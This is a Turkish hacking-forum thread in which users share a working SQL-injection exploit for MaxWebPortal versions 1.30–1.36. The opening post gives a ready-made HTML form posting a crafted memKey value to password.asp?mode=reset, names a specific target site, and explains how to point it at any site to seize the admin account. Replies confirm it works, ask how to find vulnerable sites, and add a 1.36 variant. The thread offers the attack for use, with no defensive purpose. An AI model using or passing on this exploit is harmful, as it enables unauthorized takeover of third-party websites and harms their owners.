folder Tahribat.com Forumları
linefolder Web sitesi Güvenliği, DOS - DDOS Saldırıları...
linefolder Maxwebportal Sitelerinde Admin Olmak Çok Kolay ;)



Maxwebportal Sitelerinde Admin Olmak Çok Kolay ;)

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BarettamazZ
    BarettamazZ's avatar
    Kayıt Tarihi: 27/Ağustos/2005
    Erkek

    arkadşlar hani varya adamlar yazmış bi portal adınıda maxwebportal koymuşlar vallahi yonetim paneli super portalın ama elemanlar bi kaç açık bırakmışlar bende bunlardan bitanesini anlatayım dedim size artı bide foruma katkım olsun dedim .... remote yazacaktı yazmamış ben yazıyım dedim hem boylece kaynaşırız :P


    ben fazla uzatmayacam ahanda alet size bundan daha sade hale gelmiyor denendi test edildi onaylandı






    <form action="http://www.ITFAIYEBIRLIGI.COM/password.asp?mode=reset" method="post">
    <br>
    şifre: <input name="pass" type="text" value="remote" size="150"><br>
    şifre onayı: <input name="pass2" type="text" value="remote" size="150"><br>
    admin numarası: <input name="memId" type="text" value="-1" size="150"><br>
    bunu değiştirme: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2" size="150"><br><input name="Submit" type="submit" value="Gönder dayi">


    bunları kopyalayın


    text sonra html olarak kaydedin ilk denemeyi


    www.ITFAIYEBIRLIGI.COM 


    üzerinde yaptı RemotE ile beraber ama sizin  indirmek istediğiniz maxwebportal  yuklu sitenin adresini   kodların ilk satırında bulunan


    http://www.ITFAIYEBIRLIGI.COM/password.asp?mode=reset bunu yerine sizin sitenin adresii


    +/password.asp?mode=reset yazıp kaydediyorsunuz sonra html dosyasını çalıştırıp "Gönder dayı" düğmesine tıklayınca sizin yaazdığınız sitede adminsiniz


    standart olarak kullanıcı adi admin şifremizde remote panele girdikten sonra isterseniz değiştirin :D :D


    neyse fazla laf yapmayalım.. hadi hayırlısı olsunnnnn bash bash ;)


     


    Not:


    MaxWebPortal MaxWebPortal 1.35 ,1.33 ,1.32 ,1.31 1.30 versiyonlar için geçerlidir... ;)


    ...::: BarettamazZ :::...
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    KHarOn
    KHarOn's avatar
    Kayıt Tarihi: 31/Temmuz/2005
    Erkek

    valla helal olsun


    %100 çalışıyo

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    truvaa
    truvaa's avatar
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek
    Calısmasına calısıyorda burda kullanıcı adın degısmıyo sanırım admın olarak gırıyorsun :) sifreyide remote olarak kabul ediyo
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    doguhan
    doguhan's avatar
    Hıyarlık Madalyası
    Kayıt Tarihi: 27/Kasım/2003
    Erkek

    Removed...


    hikaye
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    sipidik
    sipidik's avatar
    Kayıt Tarihi: 30/Ağustos/2005
    Erkek
    hacı eyw guzel olmusda maxwebportal olup olmadıgını nasıl anlicaz bi sitenin??

    NesTo | same shit diffirent asshole
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    KHarOn
    KHarOn's avatar
    Kayıt Tarihi: 31/Temmuz/2005
    Erkek

    sitenin alt tarafınfa yazıyo


     

  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    twin
    twin's avatar
    Kayıt Tarihi: 23/Eylül/2005
    Erkek
    yaa bu siteden başka diğer açıklı siteleri nasıl buluyoz

    x
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RemotE
    RemotE's avatar
    Banlanmış Üye
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    Tabi RemotE olarak kabul Edicek Script e katkım var benim Baratte Saol Kanka Paylaştıqın için milletle halkımızla :D

    Bizi Satanı Biz Bedavaya Veririz..! http://www.intikal.org - http://www.ohbea.com
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    bonzo
    bonzo's avatar
    Kayıt Tarihi: 28/Şubat/2005
    Erkek

    Yukarida verilen  Version 1.35  icin buda  Version 1.36 için olan


    <form action="http://[URL]/password.asp?mode=reset" method="post"><br />
    <br />
    <br />
    <br />
    pass1: <input name="pass" type="text" value="123456" size="150">&lt;<br />
    br&gt;<br />
    pass2: <input name="pass2" type="text" value="123456" size="150">&lt;<br />
    br&gt;<br />
    Id: <input name="memId" type="text" value="-1" size="150">&lt;<br />
    br&gt;<br />
    Member Key: <input name="memKey" type="text" value="foo') or M_Name='admi<br />
    n' or ('1'='2&quot; size=&quot;150&quot;&gt;<br />
    <br />
    <br />
    <input name="Submit" type="submit" value="Submit">


     


     


    Gorüldügü üzere sifre kismina istediginizi yazabilirsiniz.


    Dünyayı güzellik kurtaracak .Bir insanı sevmekle başlayacak herşey/Gerçekçi ol imkansızı gerçekleştir.
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    adilselim
    adilselim's avatar
    Kayıt Tarihi: 19/Eylül/2005
    Erkek

    ustatlarım ben bu söylediklerinizi yapamadım Submit (gönder dayı) dedikten sonra beni admini olmak istediğim portala götürüyor ama hala dışardayım login kısmına giriyorum tıklıyorum olmuyor username ye admin yazıyorum yine olmuyor yanlış yaptığım şey ne lütfen anlatırmısınız


    Çocukken her gece tanrıya bana bi bisiklet vermesi içn dua ederdim daha sonra tanrının çalışma sitilinin bu olmadığını fark ettim ve ertesi gün kendime bir bisiklet çaldım, o günden beri hergece tanrıya günahlarımı affetmesi için dua ediyorum. Al Capone
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    adilselim
    adilselim's avatar
    Kayıt Tarihi: 19/Eylül/2005
    Erkek
    bu nebiçim açıklama doğru düzgün Türkçe cümle kuramamışsın sen nedemek istediğini anlayabildin mi? cünkü ben anlayamadım lütfen Türkçeye birazdaha dikkat.böylece konularda anlaşılır olur.

    Çocukken her gece tanrıya bana bi bisiklet vermesi içn dua ederdim daha sonra tanrının çalışma sitilinin bu olmadığını fark ettim ve ertesi gün kendime bir bisiklet çaldım, o günden beri hergece tanrıya günahlarımı affetmesi için dua ediyorum. Al Capone
Toplam Hit: 9133 Toplam Mesaj: 26